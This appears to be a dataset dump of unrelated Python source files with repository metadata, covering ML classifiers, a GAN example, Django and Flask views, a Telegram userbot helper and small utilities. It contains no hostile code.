def load_command(self, name, namespace, **kwargs):
"""
Parameters
----------
name : str
The name of the commmand
namespace : str
A string representation of the namespace wherin the command is located (Example: commandable.commands)
kwargs :
A dictionary to pass to the command as arguments.
"""
kwargs["namespaces"] = self.namespaces
try:
command_module: Module = importlib.import_module(namespace + "." + str.lower(name))
except ModuleNotFoundError:
return None
cmd: Command = getattr(command_module, self.to_camelcase(name))(self.arguments)
if isinstance(cmd, Command):
with cmd:
cmd.command(**kwargs)
else:
return None
return cmd
| [
"job.tiel@newcraftgroup.com"
] | job.tiel@newcraftgroup.com |
479c2117988d2ed2dca6b2805202adc6d5027b9d | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02397/s357415256.py | f7d7f986e5b38a58810ae61c71f351e5d8d9603c | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 165 | py | while True:
c = input().split()
x, y = int(c[0]), int(c[1])
if x == y == 0:
break
if y < x:
x, y = y, x
print("%d %d" % (x, y))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
46623ffb901b7b2eebaec341546d5b88580238ab | 04e434ccd57039ee6ea42e18a7eb6a85cd48aab3 | /methods.py | 524ce7ad5b47da8acf07fbae2d5ee96620b59708 | [] | no_license | trocker/Cyberbullying-Detection | 10d4a6565bf6f5acf720397705d5a069a70c6c50 | 7276060a43aaef9f33de2dc6390816eddd3f65dc | refs/heads/master | 2023-03-25T02:05:59.133351 | 2020-03-18T15:04:05 | 2020-03-18T15:04:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,745 | py | import pandas as pd
import numpy as np
import re
import os
from nltk.corpus import stopwords
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn import svm
from sklearn.model_selection import train_test_split
from sklearn import metrics
from sklearn.metrics import accuracy_score
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from sklearn.ensemble import RandomForestClassifier
#CLASSIFICATION METHOD
def Classifications(X_train_word_features, test_features, y_train, y_test, method_name):
#Naive Bayes
clf = MultinomialNB().fit(X_train_word_features, y_train)
predicted = clf.predict(test_features)
#SVM
svm_classifier = svm.SVC(kernel='linear', C = 1.0)
clf2=svm_classifier.fit(X_train_word_features, y_train)
predicted2=clf2.predict(test_features)
#Random Forest
random_forest = RandomForestClassifier()
clf3=random_forest.fit(X_train_word_features, y_train)
predicted3=clf3.predict(test_features)
print("\nAccuracies by using ",method_name)
print("Accuracy with Naive Bayes Classifier: ", accuracy_score(y_test,predicted))
print("Accuracy with SVM: ", accuracy_score(y_test,predicted2))
print("Accuracy with Random Forest: ", accuracy_score(y_test, predicted3))
return
###WEIGHTING METHODS
#TF*IDF
def TfidfWeighting (x_train, x_test):
word_vectorizer=TfidfVectorizer(
stopwords.words('turkish'),
sublinear_tf=True,
strip_accents='unicode',
analyzer='word',
token_pattern=r'\w{2,}', #vectorize 2-character words or more
ngram_range=(1, 1),
max_features=30000)
word_vectorizer.fit(x_train)
X_train_word_features = word_vectorizer.transform(x_train)
test_features = word_vectorizer.transform(x_test)
return X_train_word_features, test_features
#TF
def TfWeighting (x_train, x_test):
tf = TfidfVectorizer(use_idf=False, smooth_idf=False, sublinear_tf=False, norm=None, analyzer='word')
tf.fit(x_train)
X_train_word_features = tf.transform(x_train)
test_features = tf.transform(x_test)
return X_train_word_features, test_features
#BW
def BinaryWeighting (x_train, x_test):
count_vec = CountVectorizer(stopwords.words('turkish'), analyzer='word',
ngram_range=(1, 1), max_df=1.0, min_df=1, max_features=None, binary=True)
X_train_word_features = count_vec.fit_transform(x_train).toarray()
test_features = count_vec.transform(x_test).toarray()
return X_train_word_features, test_features
| [
"noreply@github.com"
] | noreply@github.com |
80b04bda0f5a1a85445586eeefba6f62ab5f57be | d71ea190beaa1a5ea8bb6f6e7260e3de3106478e | /semester_enrollment/views.py | ad02a55fe160781feb990f868f7d285190b4d9ad | [
"MIT"
] | permissive | c3n7/university-portal | a5e53d82746726f03268da9d9bb270fd5266438d | 82bf40a1c0d98111ffe8a184d16b543a3feec072 | refs/heads/master | 2023-08-14T05:18:28.449162 | 2021-09-24T14:01:47 | 2021-09-24T14:01:47 | 221,428,849 | 1 | 0 | MIT | 2021-09-24T14:01:47 | 2019-11-13T10:05:35 | Python | UTF-8 | Python | false | false | 2,208 | py | from django.contrib.auth.mixins import (
LoginRequiredMixin,
UserPassesTestMixin,
)
from django.shortcuts import get_object_or_404
from django.views.generic import DetailView, ListView
from django.views.generic.edit import UpdateView, CreateView
from django.urls import reverse_lazy
from django.contrib import messages
from .models import SemesterEnrollment
from students.models import Student
from course_registration.models import CourseRegistration
class SemesterEnrollmentCreateView(LoginRequiredMixin, UserPassesTestMixin, CreateView):
model = SemesterEnrollment
template_name = "semester_enrollment/add.html"
fields = ('year', 'semester')
login_url = "student_detail"
def test_func(self):
"""
Check if the user is student
"""
return (Student.objects.filter(user=self.request.user).exists())
def dispatch(self, request, *args, **kwargs):
self.enrolled_course = get_object_or_404(CourseRegistration, pk=kwargs['course_reg_pk'])
return super().dispatch(request, *args, **kwargs)
def form_valid(self, form):
form.instance.enrolled_course = self.enrolled_course
student = Student.objects.filter(user=self.request.user).first()
form.instance.student = student
return super(SemesterEnrollmentCreateView, self).form_valid(form)
class SemesterEnrollmentUpdateView(LoginRequiredMixin, UpdateView):
model = SemesterEnrollment
fields = ('year', 'semester')
template_name = "semester_enrollment/edit.html"
class SemesterEnrollmentDetailView(LoginRequiredMixin, DetailView):
model = SemesterEnrollment
template_name = "semester_enrollment/detail.html"
class SemesterEnrollmentListView(LoginRequiredMixin, ListView):
model = SemesterEnrollment
template_name = 'semester_enrollment/list.html'
ordering = ['-year', '-semester']
def get_queryset(self):
student = Student.objects.filter(user=self.request.user).first()
return super().get_queryset().filter(student=student)
# class CRStaffListView(LoginRequiredMixin, ListView):
# model = CourseRegistration
# template_name = 'list.html'
# ordering = ['is_verified', 'user__email']
| [
"kartimothy@gmail.com"
] | kartimothy@gmail.com |
31b1ea48698889979a5945ca7183f21b2bc342d8 | 9326ce62cf5ab4c87fe46f6055aabd48b7a0cfe1 | /test/Driver/Dependencies/Inputs/touch.py | f5c609089303c0cfa5cf3285fd69317f0f447da2 | [
"Apache-2.0",
"Swift-exception"
] | permissive | dan-zheng/swift | 2fae54c8eea72f9316a5c37e5af2f974707d14ad | 6a80196da3cbbb32683144b175e4028d90f5241d | refs/heads/main | 2021-11-28T05:57:42.415265 | 2021-07-09T16:23:39 | 2021-07-09T16:23:39 | 135,949,956 | 15 | 2 | Apache-2.0 | 2019-10-18T00:26:50 | 2018-06-03T23:56:41 | C++ | UTF-8 | Python | false | false | 956 | py | #!/usr/bin/env python
# touch.py - /bin/touch that writes the LLVM epoch -*- python -*-
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ----------------------------------------------------------------------------
#
# Like /bin/touch, but takes a time using the system_clock epoch.
#
# ----------------------------------------------------------------------------
import os
import sys
assert len(sys.argv) >= 2
timeVal = int(sys.argv[1])
# Update the output file mtime, or create it if necessary.
# From http://stackoverflow.com/a/1160227.
for outputFile in sys.argv[2:]:
with open(outputFile, 'a'):
os.utime(outputFile, (timeVal, timeVal))
| [
"devteam.codafi@gmail.com"
] | devteam.codafi@gmail.com |
0c9a6e7cc52d420cc0423507992780d376e1a9e7 | 3ea525af04db4f0969a85cb17b0afab7fd76e424 | /cmsplugin_feed_ai/providers/exceptions.py | 5dd7333afa1b36fec2713eae223cb8cd78e9072d | [
"MIT"
] | permissive | andersinno/cmsplugin-feed-ai | c447a8b296f4636f50cde10f8d263ffac5d4acb4 | 5787330115b553803e7a7d80ad9df0e491eafc7a | refs/heads/master | 2020-04-15T13:51:59.131361 | 2016-09-21T07:05:04 | 2016-09-21T07:05:04 | 68,205,360 | 0 | 0 | null | 2016-09-21T06:42:42 | 2016-09-14T12:42:28 | Python | UTF-8 | Python | false | false | 200 | py | # -*- coding: utf-8 -*-
class FeedException(Exception):
def __init__(self, exc):
super(FeedException, self).__init__('%s: %s' % (exc.__class__, exc))
self.original_exception = exc
| [
"jesse.laukkanen@anders.fi"
] | jesse.laukkanen@anders.fi |
4d5ae49d3097311f5d61d4990faa32a51f9d6dc6 | 749f25209878be42c92b8c4b76206c63794969a5 | /tests/export_name_s.py | a353a18ead8b994e5e8bda009a9ca2773da8a404 | [] | no_license | vakabus/septic | f24d22bc3497c0ac3e7c34cded2b914d2d58eb34 | 88849b9784d785e0978b7a39e3b49a9381378c52 | refs/heads/master | 2020-03-18T23:49:45.495135 | 2018-05-30T11:09:35 | 2018-05-30T11:09:35 | 135,431,467 | 1 | 0 | null | 2018-05-30T11:13:53 | 2018-05-30T11:13:52 | null | UTF-8 | Python | false | false | 224 | py | @export(name='renamed_func')
def original_func(a, b):
return 'ok'
@export(name='RenamedClass')
class OriginalClass:
@export
def __init__(self):
pass
@export
def func(self):
return 'ok'
| [
"jbenc@upir.cz"
] | jbenc@upir.cz |
1d08e20a707c3832aa534f66e7f853d8c23c34ee | 664888153523b056029dc8040b475d94e4d86836 | /userbot/utils/extras.py | 6be2aa1f8955464520669ba42d962bf621355521 | [] | no_license | Hobby-Dev-0/K | aa2d7c55c0235f82a26cdcc08451580cac428470 | fd91468897533e8c7e44c3a8b6fad9acf1e2ae82 | refs/heads/master | 2023-06-26T14:28:42.698755 | 2021-07-23T14:19:23 | 2021-07-23T14:19:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,138 | py | import asyncio
import os
import re
from .. import *
from ..config import Config
from ..helpers import *
# either edit or reply that msg
async def edit_or_reply(
event,
text,
parse_mode=None,
link_preview=None,
file_name=None,
aslink=False,
deflink=False,
noformat=False,
linktext=None,
caption=None,
):
link_preview = link_preview or False
reply_to = await event.get_reply_message()
if len(text) < 4096 and not deflink:
parse_mode = parse_mode or "md"
if event.sender_id in Config.SUDO_USERS:
if reply_to:
return await reply_to.reply(
text, parse_mode=parse_mode, link_preview=link_preview
)
return await event.reply(
text, parse_mode=parse_mode, link_preview=link_preview
)
await event.edit(text, parse_mode=parse_mode, link_preview=link_preview)
return event
if not noformat:
asciich = ["**", "`", "__"]
for i in asciich:
text = re.sub(rf"\{i}", "", text)
if aslink or deflink:
linktext = linktext or "Message was to big so pasted to bin"
try:
key = (
requests.post(
"https://nekobin.com/api/documents", json={"content": text}
)
.json()
.get("result")
.get("key")
)
text = linktext + f" [here](https://nekobin.com/{key})"
except Exception:
text = re.sub(r"•", ">>", text)
kresult = requests.post(
"https://del.dog/documents", data=text.encode("UTF-8")
).json()
text = linktext + f" [here](https://del.dog/{kresult['key']})"
if event.sender_id in Config.SUDO_USERS:
if reply_to:
return await reply_to.reply(text, link_preview=link_preview)
return await event.reply(text, link_preview=link_preview)
await event.edit(text, link_preview=link_preview)
return event
file_name = file_name or "output.txt"
caption = caption or None
with open(file_name, "w+") as output:
output.write(text)
if reply_to:
await reply_to.reply(caption, file=file_name)
await event.delete()
return os.remove(file_name)
if event.sender_id in Config.SUDO_USERS:
await event.reply(caption, file=file_name)
await event.delete()
return os.remove(file_name)
await event.client.send_file(event.chat_id, file_name, caption=caption)
await event.delete()
os.remove(file_name)
# delete timeout
async def delete(event, text, time=None, parse_mode=None, link_preview=None):
parse_mode = parse_mode or "md"
link_preview = link_preview or False
time = time or 10
if event.sender_id in Config.SUDO_USERS:
reply_to = await event.get_reply_message()
event = (
await reply_to.reply(text, link_preview=link_preview, parse_mode=parse_mode)
if reply_to
else await event.reply(
text, link_preview=link_preview, parse_mode=parse_mode
)
)
else:
event = await event.edit(
text, link_preview=link_preview, parse_mode=parse_mode
)
await asyncio.sleep(time)
return await event.delete()
async def edit_delete(event, text, time=None, parse_mode=None, link_preview=None):
sudo_users = _sudousers_list()
parse_mode = parse_mode or "md"
link_preview = link_preview or False
time = time or 5
if event.sender_id in sudo_users:
reply_to = await event.get_reply_message()
catevent = (
await reply_to.reply(text, link_preview=link_preview, parse_mode=parse_mode)
if reply_to
else await event.reply(
text, link_preview=link_preview, parse_mode=parse_mode
)
)
else:
event = await event.edit(
text, link_preview=link_preview, parse_mode=parse_mode
)
await asyncio.sleep(time)
return await event.delete()
| [
"noreply@github.com"
] | noreply@github.com |
4011ab64d779b6715e55022edcece9470b6c3957 | eefa1f707e6be6f16417947894ec03bf918b3922 | /tools_py/pack/examples/GAN/InfoGAN-mnist.py | 3e42b15bed3d1d97049683df83ab368c3fd64317 | [
"Apache-2.0"
] | permissive | zhouyq041/master | c7c59608e72b53fc1a3210a221a0d0c545fcec31 | 4826620b8090a58c439c1f540351ac168e3cd880 | refs/heads/master | 2020-03-28T10:07:33.833241 | 2018-09-10T03:16:19 | 2018-09-10T03:16:19 | 148,084,922 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,720 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: InfoGAN-mnist.py
# Author: Yuxin Wu <ppwwyyxxc@gmail.com>
import cv2
import numpy as np
import tensorflow as tf
import os
import argparse
from tensorpack import *
from tensorpack.utils import viz
from tensorpack.tfutils.scope_utils import auto_reuse_variable_scope, under_name_scope
from tensorpack.tfutils import optimizer, summary, gradproc
from tensorpack.dataflow import dataset
from GAN import GANTrainer, GANModelDesc
"""
To train:
./InfoGAN-mnist.py
To visualize:
./InfoGAN-mnist.py --sample --load path/to/model
A pretrained model is at http://models.tensorpack.com/GAN/
"""
BATCH = 128
# latent space is cat(10) x uni(2) x noise(NOISE_DIM)
NUM_CLASS = 10
NUM_UNIFORM = 2
DIST_PARAM_DIM = NUM_CLASS + NUM_UNIFORM
NOISE_DIM = 62
# prior: the assumption how the latent factors are presented in the dataset
DIST_PRIOR_PARAM = [1.] * NUM_CLASS + [0.] * NUM_UNIFORM
def shapeless_placeholder(x, axis, name):
"""
Make the static shape of a tensor less specific.
If you want to feed to a tensor, the shape of the feed value must match
the tensor's static shape. This function creates a placeholder which
defaults to x if not fed, but has a less specific static shape than x.
See also `tensorflow#5680 <https://github.com/tensorflow/tensorflow/issues/5680>`_.
Args:
x: a tensor
axis(int or list of ints): these axes of ``x.get_shape()`` will become
None in the output.
name(str): name of the output tensor
Returns:
a tensor equal to x, but shape information is partially cleared.
"""
shp = x.get_shape().as_list()
if not isinstance(axis, list):
axis = [axis]
for a in axis:
if shp[a] is None:
raise ValueError("Axis {} of shape {} is already unknown!".format(a, shp))
shp[a] = None
x = tf.placeholder_with_default(x, shape=shp, name=name)
return x
def get_distributions(vec_cat, vec_uniform):
cat = tf.distributions.Categorical(logits=vec_cat, validate_args=True, name='cat')
uni = tf.distributions.Normal(vec_uniform, scale=1., validate_args=True, allow_nan_stats=False, name='uni_a')
return cat, uni
def entropy_from_samples(samples, vec):
"""
Estimate H(x|s) ~= -E_{x \sim P(x|s)}[\log Q(x|s)], where x are samples, and Q is parameterized by vec.
"""
samples_cat = tf.argmax(samples[:, :NUM_CLASS], axis=1, output_type=tf.int32)
samples_uniform = samples[:, NUM_CLASS:]
cat, uniform = get_distributions(vec[:, :NUM_CLASS], vec[:, NUM_CLASS:])
def neg_logprob(dist, sample, name):
nll = -dist.log_prob(sample)
# average over batch
return tf.reduce_sum(tf.reduce_mean(nll, axis=0), name=name)
entropies = [neg_logprob(cat, samples_cat, 'nll_cat'),
neg_logprob(uniform, samples_uniform, 'nll_uniform')]
return entropies
@under_name_scope()
def sample_prior(batch_size):
cat, _ = get_distributions(DIST_PRIOR_PARAM[:NUM_CLASS], DIST_PRIOR_PARAM[NUM_CLASS:])
sample_cat = tf.one_hot(cat.sample(batch_size), NUM_CLASS)
"""
OpenAI official code actually models the "uniform" latent code as
a Gaussian distribution, but obtain the samples from a uniform distribution.
"""
sample_uni = tf.random_uniform([batch_size, NUM_UNIFORM], -1, 1)
samples = tf.concat([sample_cat, sample_uni], axis=1)
return samples
class Model(GANModelDesc):
def inputs(self):
return [tf.placeholder(tf.float32, (None, 28, 28), 'input')]
def generator(self, z):
l = FullyConnected('fc0', z, 1024, activation=BNReLU)
l = FullyConnected('fc1', l, 128 * 7 * 7, activation=BNReLU)
l = tf.reshape(l, [-1, 7, 7, 128])
l = Conv2DTranspose('deconv1', l, 64, 4, 2, activation=BNReLU)
l = Conv2DTranspose('deconv2', l, 1, 4, 2, activation=tf.identity)
l = tf.sigmoid(l, name='gen')
return l
@auto_reuse_variable_scope
def discriminator(self, imgs):
with argscope(Conv2D, kernel_size=4, strides=2):
l = (LinearWrap(imgs)
.Conv2D('conv0', 64)
.tf.nn.leaky_relu()
.Conv2D('conv1', 128)
.BatchNorm('bn1')
.tf.nn.leaky_relu()
.FullyConnected('fc1', 1024)
.BatchNorm('bn2')
.tf.nn.leaky_relu()())
logits = FullyConnected('fct', l, 1)
encoder = (LinearWrap(l)
.FullyConnected('fce1', 128)
.BatchNorm('bne')
.tf.nn.leaky_relu()
.FullyConnected('fce-out', DIST_PARAM_DIM)())
return logits, encoder
def _build_graph(self, inputs):
real_sample = inputs[0]
real_sample = tf.expand_dims(real_sample, -1)
# sample the latent code:
zc = shapeless_placeholder(sample_prior(BATCH), 0, name='z_code')
z_noise = shapeless_placeholder(
tf.random_uniform([BATCH, NOISE_DIM], -1, 1), 0, name='z_noise')
z = tf.concat([zc, z_noise], 1, name='z')
with argscope([Conv2D, Conv2DTranspose, FullyConnected],
kernel_initializer=tf.truncated_normal_initializer(stddev=0.02)):
with tf.variable_scope('gen'):
fake_sample = self.generator(z)
fake_sample_viz = tf.cast((fake_sample) * 255.0, tf.uint8, name='viz')
tf.summary.image('gen', fake_sample_viz, max_outputs=30)
# may need to investigate how bn stats should be updated across two discrim
with tf.variable_scope('discrim'):
real_pred, _ = self.discriminator(real_sample)
fake_pred, dist_param = self.discriminator(fake_sample)
"""
Mutual information between x (i.e. zc in this case) and some
information s (the generated samples in this case):
I(x;s) = H(x) - H(x|s)
= H(x) + E[\log P(x|s)]
The distribution from which zc is sampled, in this case, is set to a fixed prior already.
So the first term is a constant.
For the second term, we can maximize its variational lower bound:
E_{x \sim P(x|s)}[\log Q(x|s)]
where Q(x|s) is a proposal distribution to approximate P(x|s).
Here, Q(x|s) is assumed to be a distribution which shares the form
of P, and whose parameters are predicted by the discriminator network.
"""
with tf.name_scope("mutual_information"):
with tf.name_scope('prior_entropy'):
cat, uni = get_distributions(DIST_PRIOR_PARAM[:NUM_CLASS], DIST_PRIOR_PARAM[NUM_CLASS:])
ents = [cat.entropy(name='cat_entropy'), tf.reduce_sum(uni.entropy(), name='uni_entropy')]
entropy = tf.add_n(ents, name='total_entropy')
# Note that the entropy of prior is a constant. The paper mentioned it but didn't use it.
with tf.name_scope('conditional_entropy'):
cond_ents = entropy_from_samples(zc, dist_param)
cond_entropy = tf.add_n(cond_ents, name="total_entropy")
MI = tf.subtract(entropy, cond_entropy, name='mutual_information')
summary.add_moving_summary(entropy, cond_entropy, MI, *cond_ents)
# default GAN objective
self.build_losses(real_pred, fake_pred)
# subtract mutual information for latent factors (we want to maximize them)
self.g_loss = tf.subtract(self.g_loss, MI, name='total_g_loss')
self.d_loss = tf.subtract(self.d_loss, MI, name='total_d_loss')
summary.add_moving_summary(self.g_loss, self.d_loss)
# distinguish between variables of generator and discriminator updates
self.collect_variables()
def _get_optimizer(self):
lr = tf.get_variable('learning_rate', initializer=2e-4, dtype=tf.float32, trainable=False)
opt = tf.train.AdamOptimizer(lr, beta1=0.5, epsilon=1e-6)
# generator learns 5 times faster
return optimizer.apply_grad_processors(
opt, [gradproc.ScaleGradient(('gen/.*', 5))])
def get_data():
ds = ConcatData([dataset.Mnist('train'), dataset.Mnist('test')])
ds = BatchData(ds, BATCH)
return ds
def sample(model_path):
pred = OfflinePredictor(PredictConfig(
session_init=get_model_loader(model_path),
model=Model(),
input_names=['z_code', 'z_noise'],
output_names=['gen/viz']))
# sample all one-hot encodings (10 times)
z_cat = np.tile(np.eye(10), [10, 1])
# sample continuos variables from -2 to +2 as mentioned in the paper
z_uni = np.linspace(-2.0, 2.0, num=100)
z_uni = z_uni[:, None]
IMG_SIZE = 400
while True:
# only categorical turned on
z_noise = np.random.uniform(-1, 1, (100, NOISE_DIM))
zc = np.concatenate((z_cat, z_uni * 0, z_uni * 0), axis=1)
o = pred(zc, z_noise)[0]
viz1 = viz.stack_patches(o, nr_row=10, nr_col=10)
viz1 = cv2.resize(viz1, (IMG_SIZE, IMG_SIZE))
# show effect of first continous variable with fixed noise
zc = np.concatenate((z_cat, z_uni, z_uni * 0), axis=1)
o = pred(zc, z_noise * 0)[0]
viz2 = viz.stack_patches(o, nr_row=10, nr_col=10)
viz2 = cv2.resize(viz2, (IMG_SIZE, IMG_SIZE))
# show effect of second continous variable with fixed noise
zc = np.concatenate((z_cat, z_uni * 0, z_uni), axis=1)
o = pred(zc, z_noise * 0)[0]
viz3 = viz.stack_patches(o, nr_row=10, nr_col=10)
viz3 = cv2.resize(viz3, (IMG_SIZE, IMG_SIZE))
canvas = viz.stack_patches(
[viz1, viz2, viz3],
nr_row=1, nr_col=3, border=5, bgcolor=(255, 0, 0))
viz.interactive_imshow(canvas)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', help='comma separated list of GPU(s) to use.')
parser.add_argument('--load', help='load model')
parser.add_argument('--sample', action='store_true', help='visualize the space of the 10 latent codes')
args = parser.parse_args()
if args.gpu:
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
if args.sample:
BATCH = 100
sample(args.load)
else:
logger.auto_set_dir()
GANTrainer(QueueInput(get_data()),
Model()).train_with_defaults(
callbacks=[ModelSaver(keep_checkpoint_every_n_hours=0.1)],
steps_per_epoch=500,
max_epoch=100,
session_init=SaverRestore(args.load) if args.load else None
)
| [
"1062558260@qq.com"
] | 1062558260@qq.com |
c9faad80f5c8d95ffc3a2906cb7f3de2e01d37e6 | 0b655cb2f170743e6a312931f1905278ce8f0c23 | /lab4/core/scene.py | bb8e10f7900598ab4f0a36cfb9ff38ece5f982d6 | [] | no_license | VKuzia/gl-py-labs | af9bdb652e71252c73a723937911a11ac1a2083d | 6172d2756413122b160745cd1aa771e5cd6b6416 | refs/heads/master | 2023-07-15T00:50:45.664591 | 2021-08-15T13:49:39 | 2021-08-15T13:49:39 | 368,591,965 | 1 | 0 | null | 2021-08-15T13:49:39 | 2021-05-18T16:07:30 | Python | UTF-8 | Python | false | false | 1,055 | py | import moderngl
import typing as tp
from moderngl_window.opengl.vao import VAO
from pyrr import Matrix44
class Scene:
def __init__(self, program: moderngl.Program, aspect_ratio: float, camera_translation):
self.program = program
self.camera_translation_matrix = Matrix44.from_translation(camera_translation, dtype='f4')
self.update_view(self.camera_translation_matrix)
self.update_proj(aspect_ratio)
self.program['global_light_pos'] = 1.0, 1.0, 2.0
self.program['light_color'] = 1.0, 1.0, 1.0
def update_proj(self, aspect_ratio: float):
perspective_projection = Matrix44.perspective_projection(30, aspect_ratio, 0.1, 100, dtype='f4')
self.program['proj'].write(perspective_projection)
def update_view(self, camera_matrix):
self.program['view'].write(camera_matrix)
def render(self, rendering_data: tp.Tuple[VAO, Matrix44]):
for geometry, model in rendering_data:
self.program['model'].write(model)
geometry.render(self.program)
| [
"noreply@github.com"
] | noreply@github.com |
2e22a7b99d1f8c4f1f5ce4eb4dafcbd83332bbf1 | d5fe9d0c7c93c3250b9e212435b02d8373dec091 | /code/65.py | 1dd66f853d153787cc61be6ee33a280ffb264627 | [] | no_license | HarshaaArunachalam/GUV | 6937adb84f0928f08c9fbc519310abc06ef3541a | c047887bf6c19a4950c5f634111e1c02966367e5 | refs/heads/master | 2020-05-31T10:52:23.280052 | 2019-08-10T20:23:11 | 2019-08-10T20:23:11 | 190,249,464 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 94 | py | N=int(input())
Na=input().split()
Na=list(Na)
for i in Na:
if(int(i)<N):
print(i)
| [
"noreply@github.com"
] | noreply@github.com |
f58b598fb89ada29e134b0652a5a53c1f4e340a5 | bdc486ec6dc0e5c51f0d80c35d024ffafe02fee6 | /app/__init__.py | 913d5313f12e81eb68069dbb1b05e9df627bcdef | [] | no_license | ikaru942/Flask-Pundit | e28f655ca4938e02cf16066af5815316b49f4e79 | d4a129a7c2e9e1f72d4b5f100eab4f270935963f | refs/heads/master | 2020-05-02T08:23:27.225777 | 2019-03-27T21:38:06 | 2019-03-27T21:38:06 | 177,495,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 506 | py | from flask import Flask
from config import Config
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_login import LoginManager
from elasticsearch import Elasticsearch
app = Flask(__name__)
app.config.from_object(Config)
db = SQLAlchemy(app)
migrate = Migrate(app, db)
login = LoginManager(app)
login.login_view = 'login'
app.elasticsearch = Elasticsearch([app.config['ELASTICSEARCH_URL']]) \
if app.config['ELASTICSEARCH_URL'] else None
from app import models
| [
"imaya.karunanayake16@st.johns.edu"
] | imaya.karunanayake16@st.johns.edu |
586070c8bec45c7012d499b7c9a7ec6d6b2afe7b | df8cfbcbd0156f5497fbffa5266f4db1bdb21322 | /neural_networks/rosenblatt.py | 143d2a08f47286edd46b9a8d91381fe2192b83c2 | [] | no_license | NEWjers/AI | 9a8b893101d4fe9f2c13332ec8d6f1c8a58fbb70 | 63a5486f0a8cae6e4113d5757b46da7c54f26866 | refs/heads/main | 2023-05-13T19:35:15.002705 | 2021-06-08T06:28:16 | 2021-06-08T06:28:16 | 374,904,077 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 865 | py | import numpy as np
class RBPerceptron:
def __init__(self, number_of_epochs = 100, learning_rate = 0.1):
self.number_of_epochs = number_of_epochs
self.learning_rate = learning_rate
def train(self, X, D):
num_features = X.shape[1]
self.w = np.zeros(num_features + 1)
for i in range(self.number_of_epochs):
for sample, desired_outcome in zip(X, D):
prediction = self.predict(sample)
difference = (desired_outcome - prediction)
weight_update = self.learning_rate * difference
self.w[1:] += weight_update * sample
self.w[0] += weight_update
return self
def predict(self, sample):
outcome = np.dot(sample, self.w[1:]) + self.w[0]
return np.where(outcome > 0, 1, 0) | [
"serjsonet@gmail.com"
] | serjsonet@gmail.com |
4105691310284155e93357df83d7741f403738fd | a6f4e2e2b2e25f7af509598327aaaa5c795433ac | /django_gocardless/views.py | 7208815d058b283889ea24034697e84804b85aa8 | [] | no_license | adamcharnock/django-gocardless | 4042e9dc6a179cf2030064855b82411adc960470 | ac126fcb12baf8a33472f0e22b29ede2b92e27ed | refs/heads/master | 2021-01-18T13:24:22.265030 | 2014-05-08T17:56:35 | 2014-05-08T17:56:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,746 | py | import json
import logging
from django.conf import settings
from django.http.response import HttpResponseBadRequest
from django.views.generic.base import View, logger
from gocardless.utils import generate_signature
class GoCardlessPayloadMixin(object):
def get_payload(self, request):
if not hasattr(self, '_payload'):
if request.method.lower() == 'get':
self._payload = request.GET.dict()
else:
self._payload = json.loads(request.body)['payload']
return self._payload
class GoCardlessSignatureMixin(GoCardlessPayloadMixin):
""" Will verify a GoCardless signature """
manual_signature_check = False
def verify_signature(self, request):
data = self.get_payload(request)
if not data:
logger.warning('No payload or request data found')
return False
pms = data.copy()
pms.pop('signature')
signature = generate_signature(pms, settings.GOCARDLESS_APP_SECRET)
if signature == data['signature']:
return True
return False
def dispatch(self, request, *args, **kwargs):
if not self.manual_signature_check and not self.verify_signature(request):
return self.handle_invalid_signature(request, *args, **kwargs)
response = super(GoCardlessSignatureMixin, self).dispatch(request, *args, **kwargs)
response['Cache-Control'] = 'no-cache'
return response
def handle_invalid_signature(self, request, *args, **kwargs):
response = HttpResponseBadRequest('Signature did not validate')
response['Cache-Control'] = 'no-cache'
return response
class GoCardlessView(GoCardlessSignatureMixin, View):
pass | [
"adam@omniwiki.co.uk"
] | adam@omniwiki.co.uk |
4943cfc0184c4c3df9fbab1578b3b2e97fc886c8 | c4e1afc488da5411dfcd27c16ed23efba14b0fd6 | /src/lliurex/variables/dhcp_deny_unknown_clients.py | 6f8929cf529faad2033749955a42967bedbc7691 | [] | no_license | lliurex/python-llxvars | 7eba023b489e5d466ff24ea0fd53a5417a65e214 | 51745a7725d6342918431807e3897b032e6c2f6e | refs/heads/master | 2021-06-21T00:10:27.845595 | 2021-01-28T09:08:32 | 2021-01-28T09:08:32 | 165,815,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 104 | py | def init(args=None):
try:
name = args['DENY_UNKNOWN']
except:
name = 'no'
return name
#def init
| [
"hectorgh@gmail.com"
] | hectorgh@gmail.com |
